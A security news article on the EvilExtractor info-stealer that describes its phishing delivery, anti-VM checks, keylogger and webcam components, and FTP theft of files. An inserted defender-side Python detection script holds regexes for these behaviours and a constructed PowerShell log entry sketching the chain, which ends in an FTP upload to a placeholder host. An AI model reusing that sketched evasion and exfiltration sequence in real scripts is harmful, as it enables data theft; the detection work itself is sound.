A phishing campaign, ongoing since March, has been actively targeting Microsoft Windows users in Europe and the U.S. The campaign uses a malicious tool called EvilExtractor (or Evil Extractor) that poses as an educational tool, developed by a company known as Kodex. Released in October 2022, the tool is being constantly upgraded for enhanced malicious capabilities.
EvilExtractor - A multi-module threat
According to Fortinet, EvilExtractor is developed to target Windows and steal data and files from endpoint devices. It comes with various modules that work using an FTP service.
The tool is distributed via phishing emails and masquerades as a legitimate file, such as a Dropbox document or an Adobe PDF.
Once loaded, it uses PowerShell for carrying out malicious activities.
This includes checking the environment for virtual machines and for VirusTotal's malware-scanning infrastructure in order to evade detection.
The tool comes with a ransomware function, named Kodex Ransomware, for encrypting compromised systems.
Operational details
The primary code of EvilExtractor is a PowerShell script that includes various modules, such as date time checking, anti-sandbox/VM/Scanner, FTP server setting, stealing data, clearing logs, and uploading stolen data.
The malware first checks whether the system's date is between November 9, 2022, and April 12, 2023. It then compares the product model with a predefined list of 187 products, including VMware, Hyper-V, VirusTotal and other virtual machine or sandbox products.
It then downloads three components, KK2023[.]zip (used for stealing browser data), Confirm[.]zip (a keylogger), and MnMs[.]zip (a webcam extractor).
It extracts files with certain extensions from the Desktop and Downloads folders, such as jpeg, jpg, png, and mp3. It also uses the CopyFromScreen method to capture a screenshot.
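A defender-side illustration of the behaviours described above, added here and not part of the original article or of the malware itself: a small scorer for PowerShell script-block log text that flags the traits the article lists (date-window check, product-model lookup, CopyFromScreen, media sweep of Desktop/Downloads, FTP upload) and reports blocks where several appear together. The regexes and the sample log entries are constructed assumptions for this example, not signatures or code taken from EvilExtractor.

```python
import re

# Each rule names one behaviour the article attributes to EvilExtractor.
# The patterns are assumptions written for this example, not signatures
# taken from the malware; they are broad on purpose and will need tuning.
RULES = [
    ("date_window_check", re.compile(r"Get-Date\b.*\s-(lt|gt|le|ge)\b", re.I | re.S)),
    ("vm_product_model_check", re.compile(r"Win32_ComputerSystem\b.*\bModel\b", re.I | re.S)),
    ("screenshot_copyfromscreen", re.compile(r"\bCopyFromScreen\b", re.I)),
    ("desktop_downloads_media_sweep", re.compile(r"(Desktop|Downloads?)\b.*\*\.(jpe?g|png|mp3)", re.I | re.S)),
    ("ftp_upload", re.compile(r"ftp://|FtpWebRequest|WebRequestMethods\.Ftp", re.I)),
]

def score_script_block(text: str) -> dict:
    """Return the matched rule names and a score of one point per rule.
    A single hit is common in benign admin tooling; several hits in one
    script block reproduce the chain the article describes."""
    hits = [name for name, pat in RULES if pat.search(text)]
    return {"hits": hits, "score": len(hits)}

def triage(entries, threshold: int = 3):
    """Indexes and results of the entries whose score reaches the threshold."""
    flagged = []
    for i, entry in enumerate(entries):
        result = score_script_block(entry)
        if result["score"] >= threshold:
            flagged.append((i, result))
    return flagged

# Constructed script-block text standing in for Event ID 4104 log entries.
# Entry 2 is a deliberately fragmentary sketch of the described chain.
CONSTRUCTED_LOGS = [
    r"Get-ChildItem C:\Users\*\Downloads -Recurse | Measure-Object",              # inventory script
    r"Add-Type -AssemblyName System.Drawing; $g.CopyFromScreen(0,0,0,0,$b.Size)",  # helpdesk tool
    r"$d=Get-Date; if($d -lt [datetime]'2022-11-09' -or $d -gt [datetime]'2023-04-12'){exit}; "
    r"$m=(Get-WmiObject Win32_ComputerSystem).Model; if($list -contains $m){exit}; "
    r"$g.CopyFromScreen(0,0,0,0,$b.Size); "
    r'Get-ChildItem "$env:USERPROFILE\Desktop" -Include *.jpg,*.png,*.mp3 -Recurse | ...; '
    r"[System.Net.FtpWebRequest]::Create('ftp://example.invalid/...')",
]

if __name__ == "__main__":
    for idx, result in triage(CONSTRUCTED_LOGS):
        print(f"entry {idx}: score {result['score']} hits {result['hits']}")
```

Only the third constructed entry reaches the default threshold; the benign screenshot helper scores a single point and is left alone.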
Conclusion
EvilExtractor appears to be a capable info-stealer equipped with multiple malicious features, which its authors keep upgrading with new functions and improved persistence. Users should therefore be aware of this new info-stealer and be wary of suspicious mail received from unknown sources.